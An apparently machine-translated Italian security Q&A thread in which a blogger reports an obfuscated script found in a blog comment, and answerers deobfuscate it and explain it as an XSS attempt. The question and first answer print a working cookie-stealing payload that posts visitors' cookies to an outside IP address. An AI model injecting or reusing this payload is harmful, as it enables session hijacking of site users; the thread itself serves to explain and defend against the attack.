it-swarm.dev

Ho trovato codice offuscato in un commento sul mio blog. Cosa dovrei fare?

Oggi stavo controllando i commenti sul mio blog e ho trovato uno strano commento, ecco il testo esatto

<script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1]]},function (){} ,_0x352a[2]);</script>

Cosa significa? È un errore?

Nota che ho avuto un grosso problema con XSS l'estate scorsa ma un esperto di sicurezza l'ha risolto. Oggi l'ho contattato e mi ha detto che va bene e che non dovrei preoccuparmi. Ma sono preoccupato.

47
Green Fly

Prima di tutto, il tuo ragazzo della sicurezza ha probabilmente ragione. Non sembra che tu abbia nulla di cui preoccuparti perché dalla tua descrizione del problema e dalla risposta del ragazzo penso che i tag di script siano stati correttamente codificati. Pensala come un'arma neutralizzata. È lì, sì, ma non può fare alcun danno.

Eseguendo quel codice attraverso un deobfuscatore ci dà

$["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html")

Ora "beatificiamo" il codice per renderlo più leggibile

$["post"]("114.45.217.33/vlk.php", {
    cookie: document["cookie"]
}, function () {}, "html")

Come puoi vedere, l'attaccante sperava che il tuo sito fosse vulnerabile a XSS per sfruttarlo e rubare i cookie dei tuoi visitatori, incluso il tuo. Sta anche supponendo/sperando che tu stia usando jQuery, ed è in realtà un presupposto molto ragionevole in questi giorni. Se riescono a rubare i tuoi cookie, otterranno l'identificatore di sessione e potenzialmente accederanno come uno dei tuoi utenti o anche come account amministratore.

Non sono sicuro del perché abbia lasciato lì la funzione di callback o il tipo di risposta. La loro rimozione avrebbe reso il carico utile ancora più piccolo.

L'esecuzione di quell'indirizzo IP tramite uno strumento di controllo della lista nera ci mostra che è probabile che l'host sia compromesso. Questo sembra sicuramente un attacco casuale da parte di un bot che cerca di inserire quel codice in blog e siti casuali nella speranza che uno di loro sia vulnerabile.

enter image description here

83
Adi

Oltre alla risposta di Adnan:

Questo è un sottoprodotto di quando un utente malintenzionato confonde la tua applicazione (invia semplicemente tonnellate di payload per vedere se uno funziona). Se l'applicazione gestisce correttamente la codifica e l'escape dell'input dell'utente, non dovresti preoccuparti di essere vulnerabile.

Esistono alcune contromisure che è possibile adottare per ridurre questi attacchi, ad esempio l'utilizzo di un firewall per applicazioni Web o di un sistema di rilevamento delle intrusioni. Questi dovrebbero bloccare automaticamente le persone che stanno confondendo la tua applicazione. Potresti anche richiedere una forma di controllo della realtà come un captcha o una sfida prima che sia consentita la pubblicazione (o se vengono rilevati molti post sequenziali). Ciò riduce anche questo tipo di inquinamento.

19
Lucas Kauffman